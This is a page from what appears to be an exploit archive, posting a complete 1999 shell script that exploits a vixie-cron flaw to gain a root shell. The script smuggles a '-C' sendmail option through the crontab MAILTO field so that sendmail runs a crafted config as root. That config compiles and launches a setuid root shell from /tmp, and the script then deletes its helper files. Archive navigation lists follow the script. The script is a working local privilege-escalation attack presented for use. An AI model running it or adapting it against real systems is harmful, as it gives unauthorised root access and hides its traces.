rootcron.txt

rootcron.txt: Posted Sep 21, 1999; An exploit for recent vixie-cron vulnerability giving instant root shell; tags | exploit, shell, root; SHA-256 | 12248c3d35660af5cfc7fca4f9ef8c8c74e5b0e6b5f36893552c05597f51c5b8; Download | Favorite | View

rootcron.txt

#!/bin/sh

clear

echo '------------------------------------------------------------------'
echo 'Marchew Hyperreal Industries                <marchew@dione.ids.pl>'
echo 'Stumilowy Las Team                       <100milowy@gdynia.ids.pl>'
echo '---------------------------- presents ----------------------------'
echo 
echo ' -= vixie-cron root sploit by Michal Zalewski <lcamtuf@ids.pl> =-'
echo

echo '[+] Checking dependencies:'

echo -n '   [*] vixie crontab: '

if [ -u /usr/bin/crontab -a -x /usr/bin/crontab ]; then
  echo "OK"
else
  echo "NOT FOUND!"
  exit 1
fi

echo -n '   [*] Berkeley Sendmail: '

if [ -f /usr/sbin/sendmail ]; then
  echo "OK"
else
  echo "NOT FOUND!"
  exit 1
fi

echo -n '   [*] gcc compiler: '

if [ -x /usr/bin/gcc ]; then
  echo "OK"
else
  echo "NOT FOUND!"
  exit 1
fi

echo '   [?] Dependiences not verified:'
echo '      [*] proper version of vixie crontab'
echo '      [*] writable /tmp without noexec/nosuid option'
echo '[+] Exploit started.'

echo "[+] Setting up .cf file for sendmail..."

cat >/tmp/vixie-cf <<__eof__
V7/Berkeley

O QueueDirectory=/tmp
O DefaultUser=0:0

R$+    \$#local $: \$1    regular local names

Mlocal,    P=/tmp/vixie-root, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,
    T=DNS/RFC822/X-Unix,
    A=vixie-root
__eof__

echo '[+] Setting up phase #1 tool (phase #2 tool compiler)...'

cat >/tmp/vixie-root <<__eof__
#!/bin/sh

gcc /tmp/vixie-own3d.c -o /tmp/vixie-own3d
chmod 6755 /tmp/vixie-own3d
__eof__

chmod 755 /tmp/vixie-root

echo '[+] Setting up phase #2 tool (rootshell launcher)...'

cat >/tmp/vixie-own3d.c <<__eof__
main() {
  setuid(0);
  setgid(0);
  unlink("/tmp/vixie-own3d");
  execl("/bin/sh","sh","-i",0);
}
__eof__

echo '[+] Putting evil crontab entry...'

crontab - <<__eof__
MAILTO='-C/tmp/vixie-cf dupek'
* * * * * nonexist
__eof__

echo '[+] Patience is a virtue... Wait up to 60 seconds.'

ILE=0

echo -n '[+] Tick.'

while [ $ILE -lt 50 ]; do
  sleep 2
  let ILE=ILE+1
  test -f /tmp/vixie-own3d && ILE=1000
  echo -n '.'
done

echo
echo '[+] Huh, done. Removing crontab entry...'

crontab -r

echo '[+] Removing helper files...'

rm -f /tmp/vixie-own3d.c /tmp/vixie-root /tmp/vixie-cf /tmp/df* /tmp/qf* &>/dev/null

echo '[*] And now...'

if [ -f /tmp/vixie-own3d ]; then
  echo '[+] Entering root shell, babe :)'
  echo
  /tmp/vixie-own3d
  echo
else
  echo '[-] Oops, no root shell found, patched system or configuration problem :('
fi

echo '[*] Exploit done.'

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

rootcron.txt

rootcron.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

rootcron.txt

Share This

rootcron.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems